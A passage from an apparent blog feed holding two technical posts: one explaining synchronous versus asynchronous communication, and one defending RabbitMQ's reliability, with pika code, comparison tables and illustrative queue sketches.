&lt;p&gt;And if you are looking for an experienced blockchain development team, we are here for you.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Synchronous vs. Asynchronous: Clearing the Confusion</title>
    <link href="https://happihacking.com/blog/posts/2025/asynchp/"/>
    <updated>2025-02-25T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/asynchp/</id>
    <summary>Messaging, APIs, RPC, and Other Buzzwords Explained</summary>
    <content type="html">&lt;h1 id=&quot;synchronous-vs-asynchronous-clearing-the-confusion&quot; tabindex=&quot;-1&quot;&gt;Synchronous vs. Asynchronous: Clearing the Confusion&lt;/h1&gt;
&lt;p&gt;The tech world is great at complicating simple concepts. Take &lt;strong&gt;synchronous&lt;/strong&gt; and &lt;strong&gt;asynchronous&lt;/strong&gt; communication, for example. Some people think it’s about threads, others think it’s about message queues, and some just use &amp;quot;async&amp;quot; because it sounds fancy.&lt;/p&gt;
&lt;p&gt;Let’s clear up the confusion.&lt;/p&gt;
&lt;h2 id=&quot;synchronous-vs-asynchronous-what-do-they-actually-mean&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Synchronous vs. Asynchronous: What Do They Actually Mean?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;At the highest level:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Synchronous&lt;/strong&gt; = &amp;quot;Wait here until you get a response.&amp;quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Asynchronous&lt;/strong&gt; = &amp;quot;Send the request and move on, check back later.&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That’s it. Really.&lt;/p&gt;
&lt;p&gt;However, this simple distinction gets complicated when we start talking about &lt;strong&gt;calls, operations, logic dependencies, and protocols.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id=&quot;1-asynchronous-calls-vs-asynchronous-operations&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;1. Asynchronous Calls vs. Asynchronous Operations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;This is where most confusion starts.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An &lt;strong&gt;asynchronous operation&lt;/strong&gt; is one that runs in the background. You trigger it and do something else while waiting for the result.&lt;/li&gt;
&lt;li&gt;An &lt;strong&gt;asynchronous call&lt;/strong&gt; is a call that does not block the caller. But-and this is key-it doesn’t mean you don’t care about the response.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples:&lt;/p&gt;
&lt;p&gt;✅ &lt;strong&gt;Asynchronous call + asynchronous operation:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You send an email using an API. The system queues it, and you don’t care exactly when it gets sent.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;✅ &lt;strong&gt;Asynchronous call + synchronous operation:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You fire off an HTTP request but don’t wait for the response (e.g., a webhook). The operation itself might complete immediately, but you’re not waiting around.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;🚨 &lt;strong&gt;Synchronous call + asynchronous operation (the common mistake):&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You call an API and wait synchronously for a response that takes time (e.g., querying a slow database). This defeats the purpose of async processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;🚨 &lt;strong&gt;Asynchronous call + synchronous logic dependency:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You fire an async call but immediately need its return value. Now you’re manually implementing blocking logic.&lt;/li&gt;
&lt;/ul&gt;
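&lt;p&gt;The combinations above can be made concrete with a small asyncio sketch. Here slow_lookup is a stand-in for any slow asynchronous operation; the names are made up for illustration:&lt;/p&gt;

```python
# Contrast an async call we await immediately (a synchronous logic
# dependency in disguise) with two calls that genuinely run
# concurrently. slow_lookup stands in for any slow async operation.
import asyncio

async def slow_lookup(key):
    await asyncio.sleep(0.01)  # pretend this is a slow database query
    return f"value-for-{key}"

async def blocking_logic():
    # Async call + synchronous logic dependency: awaiting immediately
    # means this coroutine waits, just like a synchronous call would.
    return await slow_lookup("user-1")

async def concurrent_logic():
    # Truly asynchronous: start both lookups, then collect the results.
    task_a = asyncio.create_task(slow_lookup("user-1"))
    task_b = asyncio.create_task(slow_lookup("user-2"))
    # ...other work could happen here while the lookups run...
    return await asyncio.gather(task_a, task_b)

print(asyncio.run(blocking_logic()))
print(asyncio.run(concurrent_logic()))
```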
&lt;h2 id=&quot;2-how-this-relates-to-apis-and-messaging&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;2. How This Relates to APIs and Messaging&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;When you start adding APIs, message queues, and event-driven systems into the mix, the waters get murkier.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concept&lt;/th&gt;
&lt;th&gt;Synchronous?&lt;/th&gt;
&lt;th&gt;Asynchronous?&lt;/th&gt;
&lt;th&gt;Needs a Response?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;REST API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Often&lt;/td&gt;
&lt;td&gt;❌ Rarely&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RPC (Remote Procedure Call)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Usually&lt;/td&gt;
&lt;td&gt;❌ Rarely&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message Queue (MQ)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Event-Driven (Pub/Sub, Kafka, etc.)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Webhooks&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;✅ Sometimes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id=&quot;3-rest-api-vs-rpc-vs-mq-vs-event-driven-systems&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;3. REST API vs. RPC vs. MQ vs. Event-Driven Systems&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Now, let’s connect the dots.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;REST API&lt;/strong&gt;: Usually synchronous (you call an endpoint and wait for a response). But you can design it asynchronously, like submitting a job and polling for results.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RPC (gRPC, JSON-RPC, etc.)&lt;/strong&gt;: Usually synchronous, but async variations exist. Think of it as a &amp;quot;function call over the network.&amp;quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Message Queues (&lt;a href=&quot;https://happihacking.com/blog/posts/2025/rabbitmq/&quot;&gt;RabbitMQ&lt;/a&gt;, SQS, Kafka, etc.)&lt;/strong&gt;: Asynchronous by nature. You publish a message, and the consumer processes it whenever it&#39;s ready.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-Driven Architecture&lt;/strong&gt;: Similar to MQ, but typically broader (pub/sub). Events fire, and multiple systems react to them.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;4-common-misunderstandings&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;4. Common Misunderstandings&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Let’s tackle some widespread mistakes.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;If it’s async, I can’t get a response&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;No. You can have an async request with an eventual response (e.g., polling, webhooks, or callbacks).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;A message queue means async&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Usually, but you can have blocking consumers, turning it into a pseudo-synchronous system.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;I’m using REST, so it’s synchronous&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Not necessarily. You can return a 202 Accepted and let the client poll for results.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;I need real-time responses, so async is not an option&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;WebSockets and streaming APIs allow real-time async responses.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;Synchronous calls are slow&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Not always. A well-optimized synchronous system can be faster than a poorly designed async one.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
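&lt;p&gt;The 202-and-poll pattern from point 3 can be sketched with a toy in-memory job store. The JOBS dict and these handler functions are illustrative, not any framework&#39;s API:&lt;/p&gt;

```python
# Async REST over a synchronous protocol: submit returns 202 Accepted
# plus a job id, a worker finishes the job later, and the client polls.
# JOBS and the handlers are a toy model, not a framework API.
import uuid

JOBS = {}

def submit_job(payload):
    # Would be POST /jobs: accept the work, hand back a polling URL.
    job_id = str(uuid.uuid4())
    JOBS[job_id] = {"status": "pending", "result": None}
    return 202, {"job_id": job_id, "poll": f"/jobs/{job_id}"}

def finish_job(job_id, result):
    # A background worker calls this when processing completes.
    JOBS[job_id] = {"status": "done", "result": result}

def poll_job(job_id):
    # Would be GET /jobs/{id}: 200 when done, 202 while pending.
    job = JOBS[job_id]
    if job["status"] == "done":
        return 200, job["result"]
    return 202, None

status, body = submit_job({"report": "monthly"})
finish_job(body["job_id"], {"rows": 42})
print(poll_job(body["job_id"]))
```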
&lt;h2 id=&quot;5-when-to-use-what&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;5. When to Use What&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Let’s be pragmatic.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Use synchronous (blocking) APIs&lt;/strong&gt; when the caller needs a response immediately (e.g., fetching user data).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use asynchronous APIs&lt;/strong&gt; when the operation takes time or the client doesn’t need an immediate response (e.g., background processing).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use message queues&lt;/strong&gt; when you want decoupling and resilience in distributed systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use event-driven systems&lt;/strong&gt; when multiple consumers need to react to an event without direct coupling.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Synchronous vs. asynchronous isn’t just about threading or network calls. It’s about &lt;strong&gt;how you handle dependencies between operations&lt;/strong&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need an immediate response, go synchronous.&lt;/li&gt;
&lt;li&gt;If you can defer processing, go asynchronous.&lt;/li&gt;
&lt;li&gt;If you need resilience and decoupling, use messaging.&lt;/li&gt;
&lt;li&gt;If you need multiple consumers reacting to something, go event-driven.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, go forth and stop mixing up async calls with async logic dependencies. Your future self will thank you.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Is RabbitMQ Unreliable? A Reality Check</title>
    <link href="https://happihacking.com/blog/posts/2025/rabbitmq/"/>
    <updated>2025-02-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/rabbitmq/</id>
    <summary>Spoiler: No, but context matters.</summary>
    <content type="html">&lt;h1 id=&quot;rabbitmq-the-undeserved-reputation&quot; tabindex=&quot;-1&quot;&gt;RabbitMQ: The Undeserved Reputation&lt;/h1&gt;
&lt;p&gt;There’s a common claim floating around that &lt;strong&gt;RabbitMQ is unreliable&lt;/strong&gt;. The truth is, &lt;strong&gt;RabbitMQ is not unreliable&lt;/strong&gt;-it is often just &lt;strong&gt;misunderstood&lt;/strong&gt; or &lt;strong&gt;misconfigured&lt;/strong&gt;. Like any tool, RabbitMQ has its strengths and weaknesses, and when used correctly, it is an incredibly powerful message broker.&lt;/p&gt;
&lt;p&gt;Let’s break it down:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;When should you use RabbitMQ?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How does it compare to MQTT and Kafka?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How does it compare to event-driven architectures?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Could you achieve similar results with just a database?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-is-a-message-queue-mq&quot; tabindex=&quot;-1&quot;&gt;What is a Message Queue (MQ)?&lt;/h1&gt;
&lt;p&gt;A &lt;strong&gt;Message Queue (MQ)&lt;/strong&gt; is a system that allows messages to be sent and received asynchronously. It ensures that producers and consumers are decoupled, allowing for &lt;strong&gt;load balancing, fault tolerance, and scalability&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;RabbitMQ is a &lt;strong&gt;message broker&lt;/strong&gt; that enables this functionality using &lt;strong&gt;AMQP (Advanced Message Queuing Protocol)&lt;/strong&gt;, ensuring reliable delivery with support for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Acknowledgments&lt;/strong&gt;: Prevents message loss by confirming receipt.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Persistence&lt;/strong&gt;: Ensures messages survive restarts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Redelivery &amp;amp; Dead-lettering&lt;/strong&gt;: Handles failed messages gracefully.&lt;/li&gt;
&lt;/ul&gt;
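&lt;p&gt;The acknowledge/redeliver/dead-letter cycle can be sketched with a toy in-memory queue. This is a conceptual model only-not how RabbitMQ is implemented-and all names are illustrative:&lt;/p&gt;

```python
from collections import deque

class ToyQueue:
    """Illustrative model of acknowledge/redeliver/dead-letter semantics."""
    def __init__(self, max_attempts=3):
        self.ready = deque()      # messages waiting for a consumer
        self.unacked = {}         # delivery_tag -> (message, attempts)
        self.dead_letters = []    # messages that exhausted their retries
        self.max_attempts = max_attempts
        self._tag = 0

    def publish(self, message):
        self.ready.append((message, 0))

    def deliver(self):
        """Hand one message to a consumer; it stays unacked until confirmed."""
        message, attempts = self.ready.popleft()
        self._tag += 1
        self.unacked[self._tag] = (message, attempts)
        return self._tag, message

    def ack(self, tag):
        """Consumer confirms success: the message is gone for good."""
        del self.unacked[tag]

    def nack(self, tag):
        """Consumer failed: requeue, or dead-letter after too many attempts."""
        message, attempts = self.unacked.pop(tag)
        if attempts + 1 >= self.max_attempts:
            self.dead_letters.append(message)
        else:
            self.ready.append((message, attempts + 1))

q = ToyQueue(max_attempts=2)
q.publish("charge-order-42")
tag, msg = q.deliver()
q.nack(tag)              # first attempt fails: requeued
tag, msg = q.deliver()
q.nack(tag)              # second failure: dead-lettered
print(q.dead_letters)    # ['charge-order-42']
```

&lt;p&gt;The point of the model: a message is never lost between delivery and acknowledgment-it is either requeued or parked in a dead-letter area where a human (or another consumer) can inspect it.&lt;/p&gt;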
&lt;h2 id=&quot;is-rabbitmq-unreliable&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Is RabbitMQ Unreliable?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;No. But it can be &lt;strong&gt;misconfigured&lt;/strong&gt; in ways that lead to dropped messages, unnecessary duplication, or performance issues.&lt;/p&gt;
&lt;h3 id=&quot;common-causes-of-unreliability&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Common Causes of &amp;quot;Unreliability&amp;quot;&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;No Acknowledgments (automatic acknowledgment, e.g. &lt;code&gt;auto_ack=true&lt;/code&gt;)&lt;/strong&gt; - If consumers never explicitly acknowledge messages, RabbitMQ considers each message handled the moment it is delivered and discards it, even if the consumer crashes mid-processing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Transient Queues&lt;/strong&gt; - By default, queues are &lt;strong&gt;non-durable&lt;/strong&gt;, meaning they disappear when the broker restarts unless explicitly made durable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Memory Pressure&lt;/strong&gt; - If RabbitMQ runs out of memory, it might discard messages, especially if flow control isn’t handled properly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improper Consumer Handling&lt;/strong&gt; - If consumers fail without requeuing messages, they can be lost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Network Issues&lt;/strong&gt; - Like any distributed system, RabbitMQ depends on a stable network. Partitioning without proper clustering can lead to message loss.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Configured correctly, RabbitMQ is as reliable as your requirements demand.&lt;/strong&gt;&lt;/p&gt;
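&lt;p&gt;For concreteness, here is a minimal sketch using the pika Python client of the settings that avoid the failure modes above: a durable queue, persistent delivery, bounded prefetch, and manual acknowledgments. It assumes a broker running on localhost; the queue name and the &lt;code&gt;handle&lt;/code&gt; function are placeholders for your own:&lt;/p&gt;

```python
import pika  # RabbitMQ Python client; assumes a broker on localhost

connection = pika.BlockingConnection(pika.ConnectionParameters("localhost"))
channel = connection.channel()

# Durable queue: survives a broker restart (transient is the default).
channel.queue_declare(queue="task_queue", durable=True)

# Persistent message: written to disk, not just held in memory.
channel.basic_publish(
    exchange="",
    routing_key="task_queue",
    body=b"process order 42",
    properties=pika.BasicProperties(delivery_mode=2),  # 2 = persistent
)

# Fair dispatch: at most one unacknowledged message per consumer.
channel.basic_qos(prefetch_count=1)

def on_message(ch, method, properties, body):
    handle(body)                                    # your processing logic
    ch.basic_ack(delivery_tag=method.delivery_tag)  # ack only after success

channel.basic_consume(queue="task_queue", on_message_callback=on_message)
channel.start_consuming()
```

&lt;p&gt;With these four knobs set, a crashed consumer simply causes redelivery instead of message loss.&lt;/p&gt;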
&lt;hr /&gt;
&lt;h1 id=&quot;rabbitmq-vs-kafka-vs-mqtt&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;RabbitMQ vs. Kafka vs. MQTT&lt;/strong&gt;&lt;/h1&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;RabbitMQ&lt;/th&gt;
&lt;th&gt;Kafka&lt;/th&gt;
&lt;th&gt;MQTT&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Queue-based&lt;/td&gt;
&lt;td&gt;Log-based&lt;/td&gt;
&lt;td&gt;Pub/Sub&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Durability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Optional (persistent queues)&lt;/td&gt;
&lt;td&gt;Built-in (append-only log)&lt;/td&gt;
&lt;td&gt;Typically transient&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Moderate to High&lt;/td&gt;
&lt;td&gt;Very High&lt;/td&gt;
&lt;td&gt;Low to Moderate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Use Case&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Task queues, RPC, event-driven&lt;/td&gt;
&lt;td&gt;High-throughput event streaming&lt;/td&gt;
&lt;td&gt;IoT, low-bandwidth messaging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ordering&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Per queue&lt;/td&gt;
&lt;td&gt;Per partition&lt;/td&gt;
&lt;td&gt;Not guaranteed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message TTL &amp;amp; Expiry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Retention-based (per topic, not per message)&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Built-in Acknowledgments&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (must track offsets)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id=&quot;when-to-use-which&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use Which?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;RabbitMQ:&lt;/strong&gt; When you need &lt;strong&gt;task queues, RPC, or event-driven messaging&lt;/strong&gt; with flexible routing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka:&lt;/strong&gt; When you need &lt;strong&gt;event replay, distributed log processing, or streaming analytics&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MQTT:&lt;/strong&gt; When you need &lt;strong&gt;lightweight messaging over low-power or unreliable networks&lt;/strong&gt;, especially in &lt;strong&gt;IoT&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;mq-vs-event-driven-architectures&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;MQ vs. Event-Driven Architectures&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;A common misconception is that &lt;strong&gt;message queues and event-driven systems are the same&lt;/strong&gt;. They are not.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Message Queue (MQ)&lt;/strong&gt;: Delivers each message to &lt;strong&gt;a single consumer&lt;/strong&gt;, with acknowledgments (in practice at-least-once delivery). It is about &lt;strong&gt;reliability&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-driven systems&lt;/strong&gt;: Focus on &lt;strong&gt;broadcasting events&lt;/strong&gt; to multiple consumers who may or may not act on them.&lt;/li&gt;
&lt;/ul&gt;
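&lt;p&gt;The difference fits in a few lines of Python (an illustrative in-memory sketch, not a real broker):&lt;/p&gt;

```python
from collections import deque

# Work queue: each message goes to exactly one of the competing workers.
jobs = deque(["job-1", "job-2", "job-3"])
workers = {"w1": [], "w2": []}
while jobs:
    for name, done in workers.items():
        if jobs:
            done.append(jobs.popleft())
print(workers)       # each job ends up with a single worker

# Event bus: every subscriber sees every event.
subscribers = {"billing": [], "analytics": [], "email": []}
def publish(event):
    for inbox in subscribers.values():
        inbox.append(event)
publish("order_placed")
print(subscribers)   # all three received 'order_placed'
```

&lt;p&gt;In the first half, adding a worker divides the work; in the second, adding a subscriber multiplies the deliveries. That is the whole architectural distinction in miniature.&lt;/p&gt;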
&lt;h3 id=&quot;when-to-use-an-mq&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use an MQ?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;You need &lt;strong&gt;work queues&lt;/strong&gt; where each message should be processed by exactly one worker.&lt;/li&gt;
&lt;li&gt;You have &lt;strong&gt;RPC-like behavior&lt;/strong&gt;, where responses are expected.&lt;/li&gt;
&lt;li&gt;You need &lt;strong&gt;backpressure handling&lt;/strong&gt;, so producers don’t overload consumers.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;when-to-use-an-event-driven-system&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use an Event-Driven System?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;You need &lt;strong&gt;event sourcing&lt;/strong&gt; or event logs (Kafka-style architecture).&lt;/li&gt;
&lt;li&gt;You have &lt;strong&gt;multiple consumers&lt;/strong&gt; interested in the same message.&lt;/li&gt;
&lt;li&gt;You need &lt;strong&gt;event replay and persistence&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Use RabbitMQ when you need a robust task queue. Use event-driven patterns when you need event broadcasting and replay.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;can-you-achieve-the-same-with-a-database&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Can You Achieve the Same With a Database?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Some argue that you &lt;strong&gt;don’t need an MQ&lt;/strong&gt; and could just use a database. Let’s compare:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;RabbitMQ&lt;/th&gt;
&lt;th&gt;Database (e.g., PostgreSQL)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message Ordering&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Guaranteed per queue&lt;/td&gt;
&lt;td&gt;Only via strict transactional locks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Medium (depends on indexing)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scalability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Horizontal (clustering)&lt;/td&gt;
&lt;td&gt;Harder to scale writes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message TTL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;Requires manual cleanup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Consumer Groups&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;td&gt;Needs polling or triggers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id=&quot;when-to-use-a-database-instead&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use a Database Instead?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;For simple, low-throughput use cases.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;When you need strong consistency.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;If you already have a polling mechanism and don’t want an extra dependency.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, using a database for messaging &lt;strong&gt;introduces polling inefficiencies, lacks built-in acknowledgments, and doesn’t scale as well&lt;/strong&gt; as a dedicated message broker.&lt;/p&gt;
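&lt;p&gt;To make the polling inefficiency concrete, here is a sketch of a queue built on SQLite (table and column names are made up). Note everything you must hand-roll that a broker gives you for free-polling loops, claim tracking, and cleanup:&lt;/p&gt;

```python
import sqlite3

# A queue table in SQLite: the do-it-yourself alternative to a broker.
db = sqlite3.connect(":memory:")
db.execute(
    "CREATE TABLE queue (id INTEGER PRIMARY KEY, body TEXT, claimed INTEGER DEFAULT 0)"
)

def enqueue(body):
    db.execute("INSERT INTO queue (body) VALUES (?)", (body,))

def poll():
    """Claim the oldest unclaimed row; returns None when the queue is empty."""
    row = db.execute(
        "SELECT id, body FROM queue WHERE claimed = 0 ORDER BY id LIMIT 1"
    ).fetchone()
    if row is None:
        return None   # consumers must sleep and retry: polling overhead
    db.execute("UPDATE queue SET claimed = 1 WHERE id = ?", (row[0],))
    return row[1]

enqueue("send-invoice")
print(poll())   # 'send-invoice'
print(poll())   # None -- and purging claimed rows is on you
```

&lt;p&gt;Worse, with multiple consumers the select-then-update pair above is a race condition; in PostgreSQL you would reach for &lt;code&gt;SELECT ... FOR UPDATE SKIP LOCKED&lt;/code&gt; to claim rows safely. All of this is machinery RabbitMQ already has.&lt;/p&gt;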
&lt;hr /&gt;
&lt;h1 id=&quot;final-thoughts&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Final Thoughts&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
